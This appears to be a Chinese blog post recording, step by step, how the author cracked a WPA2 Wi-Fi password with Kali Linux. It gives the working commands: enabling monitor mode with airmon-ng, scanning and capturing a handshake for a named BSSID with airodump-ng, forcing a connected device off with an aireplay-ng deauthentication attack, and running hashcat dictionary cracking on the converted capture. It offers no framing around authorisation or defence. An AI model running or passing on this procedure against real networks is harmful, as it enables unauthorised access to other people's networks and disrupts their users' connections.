摘要:对一次破解wifi密码的过程进行记录

第一步

买了个无线网卡,某宝随便买了个RT3070l免驱无线网卡

第二步

vmware 中 虚拟机-》可移动设备 将 无线网卡 共享给 kali

破解wifi密码记录1.png

第三步

ifconfig 查看网卡 。
如果网卡列表中没有无线网卡, ifconfig -a 看一下 是不是 网卡没有启用。没有启用的话 ifconfig wlan0 up 启用一下。
破解wifi密码记录2.png

破解wifi密码记录3.png

破解wifi密码记录4.png

第四步

开启网卡的监听功能

airmon-ng //查看网卡是否具有监听功能。

破解wifi密码记录5.png

airmon-ng start wlan0 //开启网卡的监听功能

破解wifi密码记录6.png

airodump-ng wlan0mon 监听附件的wifi

使用airodump-ng 命令列出无线网卡扫描到的WiFi热点详细信息,包括信号强度,加密类型,信道等。
这一步会输出两个列表,两个列表不停在刷新。

第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:

BSSID: 无线 AP 的硬件地址
PWR: 信号强度,值是负数,绝对值越小表示信号越强
CH: 无线网络信道
ENC: 加密方式,我们要破解的是 WPA2
ESSID: 无线网络的名称

第二个列表表示某个无线网络中和用户设备的连接信息:

BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址
扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出

破解wifi密码记录7.png

第五步

选取一个信号比较好的无线信号,获取握手包进行破解

//使用网卡的监听模式抓取周围的无线网络数据包,其中我们需要用到的数据包是包含了WiFi密码的握手包,当有新用户连接WiFi时会发送握手包。
airodump-ng -c 7 --bssid E2:8B:91:6F:95:76 -w /root/ wlan0mon 
参数解释:
-c 指定信道,上面已经标记目标热点的信道
-bssid指定目标路由器的BSSID,就是上面标记的BSSID
-w指定抓取的数据包保存的目录

//攻击指定wifi,强制对方wifi断开重连,从而获取握手包
aireplay-ng -0 5 -a E2:8B:91:6F:95:76 -c 46:31:5B:2E:19:49 wlan0mon 
参数解释
-0 表示发起(鉴权)deauthentication攻击
-a 指定无限路由器BSSID
-c 指定强制断开的设备

第六步

破解抓取到的wifi握手包
破解wifi密码记录8.png

抓取的握手包,需要去下面网站转换下格式https://hashcat.net/cap2hashcat/index.pl 才能在hashcat中破解
hashcat -a 0 -m 22000 转换后的握手包.hc22000 字典1.txt 字典2.txt //使用hashcat破解wifi密码

第七步

airmon-ng stop wlan0mon//关闭网卡的监听功能

参考

kali Linux 实测破解WiFi密码
如何高速猜出破解wifi密码?hashcat运用(超详细)

文章目录